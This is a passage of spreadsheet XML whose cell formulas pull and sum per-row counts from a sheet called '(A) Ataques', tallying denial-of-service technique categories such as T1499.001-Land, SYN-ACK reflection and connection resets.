      <c r="BA70" s="471">
        <f>'(A) Ataques'!LY70+'(A) Ataques'!ME70+'(A) Ataques'!MK70+'(A) Ataques'!MQ70+'(A) Ataques'!MW70</f>
        <v>0</v>
      </c>
      <c r="BB70" s="471">
        <f>'(A) Ataques'!LQ70</f>
        <v>0</v>
      </c>
      <c r="BC70" s="331">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($AY70=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD70" s="469">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!LL70,"")</f>
        <v>2</v>
      </c>
      <c r="BE70" s="510">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!LM70,"")</f>
        <v>2</v>
      </c>
      <c r="BF70" s="471">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!LN70,"")</f>
        <v>0</v>
      </c>
      <c r="BG70" s="471">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!LO70,"")</f>
        <v>2</v>
      </c>
      <c r="BH70" s="471">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!LS70,"")</f>
        <v>2</v>
      </c>
      <c r="BI70" s="331">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($BD70=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ70" s="469">
        <f>'(A) Ataques'!OL70+'(A) Ataques'!OR70+'(A) Ataques'!OX70+'(A) Ataques'!PD70+'(A) Ataques'!PJ70</f>
        <v>0</v>
      </c>
      <c r="BK70" s="510">
        <f>'(A) Ataques'!ON70+'(A) Ataques'!OT70+'(A) Ataques'!OZ70+'(A) Ataques'!PF70+'(A) Ataques'!PL70</f>
        <v>0</v>
      </c>
      <c r="BL70" s="471">
        <f>'(A) Ataques'!OP70+'(A) Ataques'!OV70+'(A) Ataques'!PB70+'(A) Ataques'!PH70+'(A) Ataques'!PN70</f>
        <v>0</v>
      </c>
      <c r="BM70" s="495">
        <f>'(A) Ataques'!OH70</f>
        <v>0</v>
      </c>
      <c r="BN70" s="331">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($BJ70=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO70" s="469">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!OC70,"")</f>
        <v>0</v>
      </c>
      <c r="BP70" s="510">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!OD70,"")</f>
        <v>0</v>
      </c>
      <c r="BQ70" s="471">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!OE70,"")</f>
        <v>0</v>
      </c>
      <c r="BR70" s="471">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!OF70,"")</f>
        <v>0</v>
      </c>
      <c r="BS70" s="471">
        <f>IF('(A) Ataques'!$AP70&lt;&gt;"NO",'(A) Ataques'!OJ70,"")</f>
        <v>0</v>
      </c>
      <c r="BT70" s="331">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($BO70=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A71" s="79">
        <f t="shared" si="1"/>
        <v>69</v>
      </c>
      <c r="B71" s="4">
        <f>IF('(A) Ataques'!AK71&lt;&gt;"NO",'(A) Ataques'!E71,"")</f>
        <v>48</v>
      </c>
      <c r="C71" s="6" t="str">
        <f>IF('(A) Ataques'!AK71&lt;&gt;"NO",IF('(A) Ataques'!M71="","",'(A) Ataques'!M71),"")</f>
        <v>T1499.001-Land</v>
      </c>
      <c r="D71" s="4" t="str">
        <f>IF('(A) Ataques'!AK71&lt;&gt;"NO",'(A) Ataques'!F71,"")</f>
        <v>T1499</v>
      </c>
      <c r="E71" s="286">
        <f>IF('(A) Ataques'!AK71&lt;&gt;"NO",'(A) Ataques'!AQ71,"")</f>
        <v>116122</v>
      </c>
      <c r="F71" s="288">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!BB71,"")</f>
        <v>0</v>
      </c>
      <c r="G71" s="392">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!BD71,"")</f>
        <v>0</v>
      </c>
      <c r="H71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!BF71,"")</f>
        <v>0</v>
      </c>
      <c r="I71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!BG71,"")</f>
        <v>0</v>
      </c>
      <c r="J71" s="530">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($F71=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BH71,"")</f>
        <v>1</v>
      </c>
      <c r="L71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BJ71,"")</f>
        <v>1</v>
      </c>
      <c r="M71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BL71,"")</f>
        <v>1</v>
      </c>
      <c r="N71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BM71,"")</f>
        <v>1</v>
      </c>
      <c r="O71" s="532">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($K71=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P71" s="292">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BN71,"")</f>
        <v>1</v>
      </c>
      <c r="Q71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BP71,"")</f>
        <v>1</v>
      </c>
      <c r="R71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BR71,"")</f>
        <v>1</v>
      </c>
      <c r="S71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BS71,"")</f>
        <v>1</v>
      </c>
      <c r="T71" s="530">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($P71=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BT71,"")</f>
        <v>0</v>
      </c>
      <c r="V71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BV71,"")</f>
        <v>0</v>
      </c>
      <c r="W71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BX71,"")</f>
        <v>0</v>
      </c>
      <c r="X71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$BY71,"")</f>
        <v>0</v>
      </c>
      <c r="Y71" s="532">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($U71=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="Z71" s="288">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!BZ71,"")</f>
        <v>116125</v>
      </c>
      <c r="AA71" s="392">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!CB71,"")</f>
        <v>4</v>
      </c>
      <c r="AB71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!CD71,"")</f>
        <v>4</v>
      </c>
      <c r="AC71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!CE71,"")</f>
        <v>1</v>
      </c>
      <c r="AD71" s="331">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF(Z71=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CF71,"")</f>
        <v>116125</v>
      </c>
      <c r="AF71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CH71,"")</f>
        <v>4</v>
      </c>
      <c r="AG71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CJ71,"")</f>
        <v>4</v>
      </c>
      <c r="AH71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CK71,"")</f>
        <v>1</v>
      </c>
      <c r="AI71" s="287">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($AE71=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ71" s="292">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CL71,"")</f>
        <v>0</v>
      </c>
      <c r="AK71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CN71,"")</f>
        <v>0</v>
      </c>
      <c r="AL71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CP71,"")</f>
        <v>0</v>
      </c>
      <c r="AM71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CQ71,"")</f>
        <v>0</v>
      </c>
      <c r="AN71" s="331">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($AJ71=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CR71,"")</f>
        <v>0</v>
      </c>
      <c r="AP71" s="322">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CT71,"")</f>
        <v>0</v>
      </c>
      <c r="AQ71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CV71,"")</f>
        <v>0</v>
      </c>
      <c r="AR71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!$CW71,"")</f>
        <v>0</v>
      </c>
      <c r="AS71" s="287">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($AO71=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT71" s="288">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!CX71,"")</f>
        <v>1</v>
      </c>
      <c r="AU71" s="392">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!CZ71,"")</f>
        <v>1</v>
      </c>
      <c r="AV71" s="4">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!DB71,"")</f>
        <v>1</v>
      </c>
      <c r="AW71" s="20">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",'(A) Ataques'!DC71,"")</f>
        <v>1</v>
      </c>
      <c r="AX71" s="331">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($AT71=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY71" s="469">
        <f>'(A) Ataques'!LU71+'(A) Ataques'!MA71+'(A) Ataques'!MG71+'(A) Ataques'!MM71+'(A) Ataques'!MS71</f>
        <v>1</v>
      </c>
      <c r="AZ71" s="510">
        <f>'(A) Ataques'!LW71+'(A) Ataques'!MC71+'(A) Ataques'!MI71+'(A) Ataques'!MO71+'(A) Ataques'!MU71</f>
        <v>1</v>
      </c>
      <c r="BA71" s="471">
        <f>'(A) Ataques'!LY71+'(A) Ataques'!ME71+'(A) Ataques'!MK71+'(A) Ataques'!MQ71+'(A) Ataques'!MW71</f>
        <v>1</v>
      </c>
      <c r="BB71" s="471">
        <f>'(A) Ataques'!LQ71</f>
        <v>1</v>
      </c>
      <c r="BC71" s="331">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($AY71=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD71" s="469">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!LL71,"")</f>
        <v>1</v>
      </c>
      <c r="BE71" s="510">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!LM71,"")</f>
        <v>1</v>
      </c>
      <c r="BF71" s="471">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!LN71,"")</f>
        <v>1</v>
      </c>
      <c r="BG71" s="471">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!LO71,"")</f>
        <v>0</v>
      </c>
      <c r="BH71" s="471">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!LS71,"")</f>
        <v>1</v>
      </c>
      <c r="BI71" s="331">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($BD71=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ71" s="469">
        <f>'(A) Ataques'!OL71+'(A) Ataques'!OR71+'(A) Ataques'!OX71+'(A) Ataques'!PD71+'(A) Ataques'!PJ71</f>
        <v>0</v>
      </c>
      <c r="BK71" s="510">
        <f>'(A) Ataques'!ON71+'(A) Ataques'!OT71+'(A) Ataques'!OZ71+'(A) Ataques'!PF71+'(A) Ataques'!PL71</f>
        <v>0</v>
      </c>
      <c r="BL71" s="471">
        <f>'(A) Ataques'!OP71+'(A) Ataques'!OV71+'(A) Ataques'!PB71+'(A) Ataques'!PH71+'(A) Ataques'!PN71</f>
        <v>0</v>
      </c>
      <c r="BM71" s="495">
        <f>'(A) Ataques'!OH71</f>
        <v>0</v>
      </c>
      <c r="BN71" s="331">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($BJ71=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO71" s="469">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!OC71,"")</f>
        <v>0</v>
      </c>
      <c r="BP71" s="510">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!OD71,"")</f>
        <v>0</v>
      </c>
      <c r="BQ71" s="471">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!OE71,"")</f>
        <v>0</v>
      </c>
      <c r="BR71" s="471">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!OF71,"")</f>
        <v>0</v>
      </c>
      <c r="BS71" s="471">
        <f>IF('(A) Ataques'!$AP71&lt;&gt;"NO",'(A) Ataques'!OJ71,"")</f>
        <v>0</v>
      </c>
      <c r="BT71" s="331">
        <f>IF('(A) Ataques'!$AK71&lt;&gt;"NO",IF($BO71=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A72" s="79">
        <f t="shared" si="1"/>
        <v>70</v>
      </c>
      <c r="B72" s="4">
        <f>IF('(A) Ataques'!AK72&lt;&gt;"NO",'(A) Ataques'!E72,"")</f>
        <v>48</v>
      </c>
      <c r="C72" s="6" t="str">
        <f>IF('(A) Ataques'!AK72&lt;&gt;"NO",IF('(A) Ataques'!M72="","",'(A) Ataques'!M72),"")</f>
        <v>T1499.002-Reflexion_synack</v>
      </c>
      <c r="D72" s="4" t="str">
        <f>IF('(A) Ataques'!AK72&lt;&gt;"NO",'(A) Ataques'!F72,"")</f>
        <v>T1499</v>
      </c>
      <c r="E72" s="286">
        <f>IF('(A) Ataques'!AK72&lt;&gt;"NO",'(A) Ataques'!AQ72,"")</f>
        <v>952</v>
      </c>
      <c r="F72" s="288">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!BB72,"")</f>
        <v>0</v>
      </c>
      <c r="G72" s="392">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!BD72,"")</f>
        <v>0</v>
      </c>
      <c r="H72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!BF72,"")</f>
        <v>0</v>
      </c>
      <c r="I72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!BG72,"")</f>
        <v>0</v>
      </c>
      <c r="J72" s="530">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($F72=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BH72,"")</f>
        <v>0</v>
      </c>
      <c r="L72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BJ72,"")</f>
        <v>0</v>
      </c>
      <c r="M72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BL72,"")</f>
        <v>0</v>
      </c>
      <c r="N72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BM72,"")</f>
        <v>0</v>
      </c>
      <c r="O72" s="532">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($K72=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P72" s="292">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BN72,"")</f>
        <v>0</v>
      </c>
      <c r="Q72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BP72,"")</f>
        <v>0</v>
      </c>
      <c r="R72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BR72,"")</f>
        <v>0</v>
      </c>
      <c r="S72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BS72,"")</f>
        <v>0</v>
      </c>
      <c r="T72" s="530">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($P72=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BT72,"")</f>
        <v>565</v>
      </c>
      <c r="V72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BV72,"")</f>
        <v>565</v>
      </c>
      <c r="W72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BX72,"")</f>
        <v>1</v>
      </c>
      <c r="X72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$BY72,"")</f>
        <v>565</v>
      </c>
      <c r="Y72" s="532">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($U72=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z72" s="288">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!BZ72,"")</f>
        <v>4</v>
      </c>
      <c r="AA72" s="392">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!CB72,"")</f>
        <v>2</v>
      </c>
      <c r="AB72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!CD72,"")</f>
        <v>2</v>
      </c>
      <c r="AC72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!CE72,"")</f>
        <v>1</v>
      </c>
      <c r="AD72" s="331">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF(Z72=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CF72,"")</f>
        <v>569</v>
      </c>
      <c r="AF72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CH72,"")</f>
        <v>567</v>
      </c>
      <c r="AG72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CJ72,"")</f>
        <v>3</v>
      </c>
      <c r="AH72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CK72,"")</f>
        <v>566</v>
      </c>
      <c r="AI72" s="287">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($AE72=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ72" s="292">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CL72,"")</f>
        <v>0</v>
      </c>
      <c r="AK72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CN72,"")</f>
        <v>0</v>
      </c>
      <c r="AL72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CP72,"")</f>
        <v>0</v>
      </c>
      <c r="AM72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CQ72,"")</f>
        <v>0</v>
      </c>
      <c r="AN72" s="331">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($AJ72=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CR72,"")</f>
        <v>565</v>
      </c>
      <c r="AP72" s="322">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CT72,"")</f>
        <v>565</v>
      </c>
      <c r="AQ72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CV72,"")</f>
        <v>1</v>
      </c>
      <c r="AR72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!$CW72,"")</f>
        <v>565</v>
      </c>
      <c r="AS72" s="287">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($AO72=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT72" s="288">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!CX72,"")</f>
        <v>565</v>
      </c>
      <c r="AU72" s="392">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!CZ72,"")</f>
        <v>565</v>
      </c>
      <c r="AV72" s="4">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!DB72,"")</f>
        <v>1</v>
      </c>
      <c r="AW72" s="20">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",'(A) Ataques'!DC72,"")</f>
        <v>565</v>
      </c>
      <c r="AX72" s="331">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($AT72=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY72" s="469">
        <f>'(A) Ataques'!LU72+'(A) Ataques'!MA72+'(A) Ataques'!MG72+'(A) Ataques'!MM72+'(A) Ataques'!MS72</f>
        <v>0</v>
      </c>
      <c r="AZ72" s="510">
        <f>'(A) Ataques'!LW72+'(A) Ataques'!MC72+'(A) Ataques'!MI72+'(A) Ataques'!MO72+'(A) Ataques'!MU72</f>
        <v>0</v>
      </c>
      <c r="BA72" s="471">
        <f>'(A) Ataques'!LY72+'(A) Ataques'!ME72+'(A) Ataques'!MK72+'(A) Ataques'!MQ72+'(A) Ataques'!MW72</f>
        <v>0</v>
      </c>
      <c r="BB72" s="471">
        <f>'(A) Ataques'!LQ72</f>
        <v>0</v>
      </c>
      <c r="BC72" s="331">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($AY72=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD72" s="469">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!LL72,"")</f>
        <v>0</v>
      </c>
      <c r="BE72" s="510">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!LM72,"")</f>
        <v>0</v>
      </c>
      <c r="BF72" s="471">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!LN72,"")</f>
        <v>0</v>
      </c>
      <c r="BG72" s="471">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!LO72,"")</f>
        <v>0</v>
      </c>
      <c r="BH72" s="471">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!LS72,"")</f>
        <v>0</v>
      </c>
      <c r="BI72" s="331">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($BD72=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BJ72" s="469">
        <f>'(A) Ataques'!OL72+'(A) Ataques'!OR72+'(A) Ataques'!OX72+'(A) Ataques'!PD72+'(A) Ataques'!PJ72</f>
        <v>0</v>
      </c>
      <c r="BK72" s="510">
        <f>'(A) Ataques'!ON72+'(A) Ataques'!OT72+'(A) Ataques'!OZ72+'(A) Ataques'!PF72+'(A) Ataques'!PL72</f>
        <v>0</v>
      </c>
      <c r="BL72" s="471">
        <f>'(A) Ataques'!OP72+'(A) Ataques'!OV72+'(A) Ataques'!PB72+'(A) Ataques'!PH72+'(A) Ataques'!PN72</f>
        <v>0</v>
      </c>
      <c r="BM72" s="495">
        <f>'(A) Ataques'!OH72</f>
        <v>0</v>
      </c>
      <c r="BN72" s="331">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($BJ72=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO72" s="469">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!OC72,"")</f>
        <v>0</v>
      </c>
      <c r="BP72" s="510">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!OD72,"")</f>
        <v>0</v>
      </c>
      <c r="BQ72" s="471">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!OE72,"")</f>
        <v>0</v>
      </c>
      <c r="BR72" s="471">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!OF72,"")</f>
        <v>0</v>
      </c>
      <c r="BS72" s="471">
        <f>IF('(A) Ataques'!$AP72&lt;&gt;"NO",'(A) Ataques'!OJ72,"")</f>
        <v>0</v>
      </c>
      <c r="BT72" s="331">
        <f>IF('(A) Ataques'!$AK72&lt;&gt;"NO",IF($BO72=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="73" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A73" s="79">
        <f t="shared" si="1"/>
        <v>71</v>
      </c>
      <c r="B73" s="4">
        <f>IF('(A) Ataques'!AK73&lt;&gt;"NO",'(A) Ataques'!E73,"")</f>
        <v>48</v>
      </c>
      <c r="C73" s="6" t="str">
        <f>IF('(A) Ataques'!AK73&lt;&gt;"NO",IF('(A) Ataques'!M73="","",'(A) Ataques'!M73),"")</f>
        <v>T1499.002-Reseteo</v>
      </c>
      <c r="D73" s="4" t="str">
        <f>IF('(A) Ataques'!AK73&lt;&gt;"NO",'(A) Ataques'!F73,"")</f>
        <v>T1499</v>
      </c>
      <c r="E73" s="286">
        <f>IF('(A) Ataques'!AK73&lt;&gt;"NO",'(A) Ataques'!AQ73,"")</f>
        <v>3</v>
      </c>
      <c r="F73" s="288">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!BB73,"")</f>
        <v>18</v>
      </c>
      <c r="G73" s="392">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!BD73,"")</f>
        <v>5</v>
      </c>
      <c r="H73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!BF73,"")</f>
        <v>4</v>
      </c>
      <c r="I73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!BG73,"")</f>
        <v>2</v>
      </c>
      <c r="J73" s="530">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($F73=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BH73,"")</f>
        <v>0</v>
      </c>
      <c r="L73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BJ73,"")</f>
        <v>0</v>
      </c>
      <c r="M73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BL73,"")</f>
        <v>0</v>
      </c>
      <c r="N73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BM73,"")</f>
        <v>0</v>
      </c>
      <c r="O73" s="532">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",IF($K73=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P73" s="292">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BN73,"")</f>
        <v>18</v>
      </c>
      <c r="Q73" s="322">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BP73,"")</f>
        <v>5</v>
      </c>
      <c r="R73" s="4">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BR73,"")</f>
        <v>4</v>
      </c>
      <c r="S73" s="20">
        <f>IF('(A) Ataques'!$AK73&lt;&gt;"NO",'(A) Ataques'!$BS73,"")</f>
        <v>2</v>
      </c>
      <c r="T73" s="530">
